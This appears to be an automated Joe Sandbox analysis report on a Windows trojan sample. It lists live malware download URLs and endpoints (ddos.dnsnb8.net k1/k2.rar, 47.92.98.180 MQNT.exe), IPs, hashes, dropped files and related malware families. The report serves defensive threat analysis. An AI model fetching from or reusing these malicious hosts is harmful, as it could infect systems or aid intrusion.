www.wshifen.com	103.235.47.188	true	false	high
www.baidu.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k1.rar	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.eyuyan.com)DVarFileInfo$	5vrRrFN56j.exe, update.exe.0.dr	false		high
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false		high
http://whois.pconline.com.cn/ipJson.jsp?json=true	5vrRrFN56j.exe	false		high
https://club.vip.qq.com/api/aggregation?g_tk=content-type:	5vrRrFN56j.exe	false		high
http://www.ibsensoftware.com/	5vrRrFN56j.exe	false		high
http://www.activestate.comHolger	SciTE.exe.1.dr	false		high
https://cdid.c-ctrip.com/model-poc2/hhttps://ip.cn/api/index?ip=&type=0User-Agent:	5vrRrFN56j.exe	false		high
https://www.uc.cn/ipIP:https://api.ip.sb/iphttps://ipinfo.io/jsonip	5vrRrFN56j.exe	false	Avira URL Cloud: safe	unknown
http://www.eyuyan.com	5vrRrFN56j.exe	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/?lang=zh-CN	5vrRrFN56j.exe	false		high
http://ddos.dnsnb8.net:799/cj//k2.rar	WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332812102.0000000000F32000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false		high
http://q1.qlogo.cn/g?b=qq&nk=	5vrRrFN56j.exe	false		high
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false		high
http://47.92.98.180:18081/myauth/web/getUserCount?skey=c0ecd8de-75e7-47a6-a22b-8adedbf78780&apikey=c	5vrRrFN56j.exe	false	Avira URL Cloud: safe	unknown
http://www.scintilla.org	SciTE.exe.1.dr	false		high
http://www.develop.com	SciTE.exe.1.dr	false		high
https://ipinfo.io/json	5vrRrFN56j.exe	false		high
http://www.spaceblue.com	SciTE.exe.1.dr	false		high
http://www.baanboard.com	SciTE.exe.1.dr	false		high
http://ddos.dnsnb8.net:799/cj//k2.rarD	WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false		high
http://47.92.98.180:88/MQNT/data.txt	5vrRrFN56j.exe, update.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.ip138.com	5vrRrFN56j.exe	false		high
http://ddos.dnsnb8.net:799/cj//k2.rar?p	WIJSmB.exe, 00000001.00000002.2333336401.000000000141A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.raryF	WIJSmB.exe, 00000001.00000002.2332812102.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.ip.sb/ip	5vrRrFN56j.exe	false		high
http://www.rftp.comJosiah	SciTE.exe.1.dr	false		high
http://www.ip138.comUser-Agent:	5vrRrFN56j.exe	false	Avira URL Cloud: safe	unknown
http://www.activestate.com	SciTE.exe.1.dr	false		high
https://ip.cn/api/index?ip=&type=0	5vrRrFN56j.exe	false		high
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	WIJSmB.exe, 00000001.00000003.2065758471.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmp	false		high
http://ddos.dnsnb8.net:799/cj//k1.rarAcrobat	WIJSmB.exe, 00000001.00000003.2074353030.0000000000EAA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarQ	WIJSmB.exe, 00000001.00000002.2332812102.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.1.dr	false		high
http://www.rftp.com	SciTE.exe.1.dr	false		high
http://ddos.dnsnb8.net:799/cj//k1.rarD	WIJSmB.exe, 00000001.00000003.2074065250.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false		high
https://www.baidu.com	5vrRrFN56j.exe	false		high
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false		high
http://47.92.98.180:88/MQNT/GX_RZ.txt	update.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://club.vip.qq.com/api/aggregation?g_tk=	5vrRrFN56j.exe	false		high
http://www.lua.org	SciTE.exe.1.dr	false		high
http://www.eyuyan.comservice	5vrRrFN56j.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net/	WIJSmB.exe, 00000001.00000002.2332812102.0000000000F32000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdid.c-ctrip.com/model-poc2/h	5vrRrFN56j.exe	false		high
http://47.92.98.180:88/MQNT/MQNT.exe	5vrRrFN56j.exe	false	Avira URL Cloud: malware	unknown
https://www.uc.cn/ip	5vrRrFN56j.exe	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	WIJSmB.exe, 00000001.00000003.2074065250.0000000000F16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false
103.235.47.188	www.wshifen.com	Hong Kong		55967	BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589499
Start date and time:	2025-01-12 17:36:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5vrRrFN56j.exe renamed because original name is a hash value
Original Sample Name:	5ad1a67084ee167d59560fbaec7529fe.exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@5/14@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.31.71, 13.107.246.45, 4.175.87.197, 2.21.65.154
Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 5vrRrFN56j.exe

Simulations

Behavior and APIs

Time	Type	Description
00:37:04	API Interceptor	1x Sleep call for process: 5vrRrFN56j.exe modified
00:37:28	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	npukfztj.biz/brsjohajbqj
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	jhvzpcfg.biz/lkvkqbtwklkptpvq
	BXOZIGZEUa.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	BXOZIGZEUa.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	bumxkqgxu.biz/vnlfrtbjm
	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k1.rar
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse	saytjshyf.biz/xoqfqirqhp
103.235.47.188	VIP-#U4f1a#U5458#U7248.exe	Get hash	malicious	BlackMoon	Browse	www.baidu.com/
	Iifpj4i2kC.exe	Get hash	malicious	FormBook	Browse	www.zruypj169g.top/md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA==
	3.exe	Get hash	malicious	BlackMoon, XRed	Browse	www.baidu.com/
	CZyOWoN2hiszA6d.exe	Get hash	malicious	FormBook	Browse	www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd
	f2.exe	Get hash	malicious	BlackMoon	Browse	www.baidu.com/
	f1.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	SecuriteInfo.com.FileRepMalware.29184.31872.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	chAJcIK6ZO.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	LisectAVT_2403002A_489.exe	Get hash	malicious	Unknown	Browse	www.baidu.com/
	d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe	Get hash	malicious	Bdaejec	Browse	www.baidu.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.wshifen.com	http://m.escritoresunidos.com/	Get hash	malicious	Unknown	Browse	103.235.47.188
	https://www.xietaoz.com/	Get hash	malicious	Unknown	Browse	103.235.47.188
	http://wap.escritoresunidos.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://m.activeselfie.com/	Get hash	malicious	Unknown	Browse	103.235.47.188
	http://m.ccsurj.org/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://www.activeselfie.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	https://aqctslc.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://www.oinsurgente.com/	Get hash	malicious	Unknown	Browse	103.235.47.188
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	103.235.46.96
ddos.dnsnb8.net	BXOZIGZEUa.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	BXOZIGZEUa.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse	44.221.84.105
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	res.ppc.elf	Get hash	malicious	Unknown	Browse	44.201.61.229
	res.mips.elf	Get hash	malicious	Unknown	Browse	54.24.210.36
	res.m68k.elf	Get hash	malicious	Unknown	Browse	54.175.16.42
	res.mpsl.elf	Get hash	malicious	Unknown	Browse	34.199.188.151
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	18.235.164.84
	https://adopt0098.bitbucket.io/	Get hash	malicious	HTMLPhisher	Browse	52.6.240.60
	http://tall-orchid-wolfsbane.glitch.me/home.html	Get hash	malicious	HTMLPhisher	Browse	34.233.109.53
	https://darkened-chalk-system-noolrgfa.glitch.me/	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	35.172.94.107
	https://ali0gkhgh.weeblysite.com/	Get hash	malicious	Unknown	Browse	3.233.158.25
	https://aollmail1-109855.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	3.233.158.25
BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd	http://m.escritoresunidos.com/	Get hash	malicious	Unknown	Browse	103.235.47.188
	https://www.xietaoz.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://wap.escritoresunidos.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://m.activeselfie.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://m.ccsurj.org/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://www.activeselfie.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	https://aqctslc.com/	Get hash	malicious	Unknown	Browse	103.235.46.96
	http://www.oinsurgente.com/	Get hash	malicious	Unknown	Browse	103.235.47.188
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	103.235.47.188
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	103.235.46.96

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	rii2.mp3.hta	Get hash	malicious	LummaC	Browse	103.235.47.188
	installer_1.05_37.4.exe	Get hash	malicious	LummaC	Browse	103.235.47.188
	Set-up.exe	Get hash	malicious	LummaC	Browse	103.235.47.188
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	103.235.47.188
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	103.235.47.188
	x.exe	Get hash	malicious	LummaC	Browse	103.235.47.188
	SDIO_R773.exe	Get hash	malicious	LummaC	Browse	103.235.47.188
	176.113.115.170_3.ps1	Get hash	malicious	LummaC	Browse	103.235.47.188
	4kN17cL4Tn.exe	Get hash	malicious	LummaC	Browse	103.235.47.188
	5tmmrpv3dn.exe	Get hash	malicious	LummaC Stealer	Browse	103.235.47.188

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\WIJSmB.exe	BXOZIGZEUa.exe	Get hash	malicious	Bdaejec	Browse
	BXOZIGZEUa.exe	Get hash	malicious	Bdaejec	Browse
	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse
	#U65b0#U7248#U7f51#U5173.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U8865#U4e01#U6253#U5305.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	#U65b0#U7248#U7f51#U5173Srv.exe	Get hash	malicious	Bdaejec, Neshta, Ramnit	Browse
	gE4NVCZDRk.exe	Get hash	malicious	Bdaejec, RunningRAT	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WIJSmB.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.5896419013560585
Encrypted:	false
SSDEEP:	384:1F0S2XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:FSQGPL4vzZq2o9W7GsxBbPr
MD5:	13B828EAB878D1F9C988EDC4EBA7746D
SHA1:	976C706155D02408414E95B3575B9777BA37AF52
SHA-256:	2784B9088DB6A59ABC5DEF78E970FDED49EFC2E15DB51EFB5D97E9A6AEE5ACE2
SHA-512:	19965E45E0DC318751A915A2C7EEAC02D2CDE9FB78FCC0EB9A9EDCC3593B91A9C084DDA5C45ED21AEF4F83740E5CD8F29231C43E53A93D8F249FE71E658CB167
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WIJSmB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.7313484903074645
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	BCE212A76EC549A2F6044296ED6319E8
SHA1:	E7E88140A7DBB4AB2B0DF7DCFBD2F88F3D001FB5
SHA-256:	C131C87F23AEA6ED01F7999D1FD650DF6BF294CAC8BA49C6EF8C1210E264D137
SHA-512:	F785E7B0DD7CFF7ADD62643AF9A873BA8014A4FA325BB9F70F531966A700BC53D8B17B32F91EDCFE8595B190402D4A81FD54CBF681D47A25C814A07F1918447B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\WIJSmB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.366507935635089
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdYuQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdYVGCq2iW7z
MD5:	30A0AB4F8FF2EA61CF2536D65476E132
SHA1:	A45C3AB33858C2EE2F65FF998758DDD46DCF5CC9
SHA-256:	F016A559A0B67072B4FB197691901F52BD471166D5743566595027416233A0DE
SHA-512:	F2E18B4595D3CA1B3F92D247568A893F19AB19DEA87C732DBC2EAF90BBAF3F4D0DFC68CEA6DAE70EB9352211C2077EB082B5E885FAB9ED117824BAB9FF5E2BFF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WIJSmB.exe_bcec74cffcfc8b7f4908e51651899551f448b2_102367fa_2e9cc071-e605-4c71-9947-9d737dd663a6\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9737859202651148
Encrypted:	false
SSDEEP:	96:L0FNcNUu7sdhn/7afzQXIDcQAc6TcEIcw3E+HbHg/5ksS/YyNlIcIPkMhFqLOygE:QEUu7a0OXyRjE/JXzuiFpZ24IO8h
MD5:	11F6EA5EFC884D173E8B4776CD9AAF94
SHA1:	63826E343D1035BEE4213796858C27C866938ABF
SHA-256:	957533A9EBF63EE70AF948ADE481773A9A4D4E25B85EE90212EC43DA7ACE15FE
SHA-512:	EF2D1747F405A09095473926863D14C5ABCC00CC234622840851C3531F56B93142C44FC50F6253334C7347626B923850ECCA925E7689BAD829F3A21061C6D470
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.2.2.0.2.2.7.7.0.5.5.0.8.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.2.2.0.2.2.8.2.8.3.6.3.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.e.9.c.c.0.7.1.-.e.6.0.5.-.4.c.7.1.-.9.9.4.7.-.9.d.7.3.7.d.d.6.6.3.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.9.a.b.9.7.3.-.e.b.1.0.-.4.7.5.3.-.a.b.6.0.-.d.e.c.0.2.4.f.e.9.4.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.I.J.S.m.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.0.-.0.0.0.1.-.0.0.1.4.-.4.d.2.7.-.c.6.3.4.1.0.6.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.4.d.7.8.4.e.c.7.7.d.1.4.7.0.a.9.b.0.1.f.9.d.f.a.d.3.9.d.f.1.0.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.W.I.J.S.m.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Jan 13 05:37:07 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	168636
Entropy (8bit):	1.7670896768470092
Encrypted:	false
SSDEEP:	384:Nm9bLbwdx9xzBex2NRIlO9tgtO9Mz5KegIKtjbGUdHyms:cbf+x9xlex+2OfqIUQeDKh9xs
MD5:	EFB22BBF8625432F51C4D8805BA1E58C
SHA1:	8B9D724D864A741663DDC5B474D72696986A7C6F
SHA-256:	9F361F6109EAAFBBDE9466D07C9E0512D035B47D7FB6BC34F7D69244B12E17AE
SHA-512:	4FB9CB06C54D66A3A1745EE458093163CF4CA9738EA0C5620B20AC0750DB4AFC60E58C9942A1E2BE9350FDA652B023DAC600C9A6CA43271BADEF2BE1E448B477
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g....................................<.... ...........S..........`.......8...........T............=...U........... ..........."..............................................................................eJ......D#......GenuineIntel............T.......p.....g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2EE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8286
Entropy (8bit):	3.6989173450745705
Encrypted:	false
SSDEEP:	192:R6l7wVeJGb6R6YXJ6lgmfmjpDH89bN7sfdvm:R6lXJq6R6Y56lgmfm+NAf4
MD5:	FF749F040E64695E7DBF792730BF526F
SHA1:	B4E38EE34E3359294A2802111178DF3A35016E49
SHA-256:	4F7546AF06342EB4315A968C329E9684E92C590EBCA3367B591BEF90C274EB99
SHA-512:	78C32115B58BA7E65E718B380E17EB5085DECEBCD24085EA57D6DBF3213ABDFF156DFA9C3EB5E850C58D1F2DC927FEB4A53FFDC09B3190A37B536C6B7024FA5A
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER30E.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.455047844874911
Encrypted:	false
SSDEEP:	48:cvIwWl8zsEuJg77aI94d0OWpW8VYsYm8M4JmT7pXFBI+q8llc001gDeTd:uIjfEkI7eu7VgJmT1k2lX01gDGd
MD5:	56B0F75AAA8BB9555135384BCB38E616
SHA1:	34A92E8B3A483C66C318C2257E64027228919DBC
SHA-256:	40C460DA9D074F1BDAD3ADF5B2AD772E2213C93952739FC38A58F1CB71941FD0
SHA-512:	18FA40E9A5AA575D41E8607B2A2B1A4829DF89AE17817FA18376C8D1A317C60AD51555782BE3C98C324B8B6DC1B046FAC73069E53FB70C2160762800C4620795
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="673719" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\WIJSmB.exe
File Type:	ASCII text
Category:	dropped
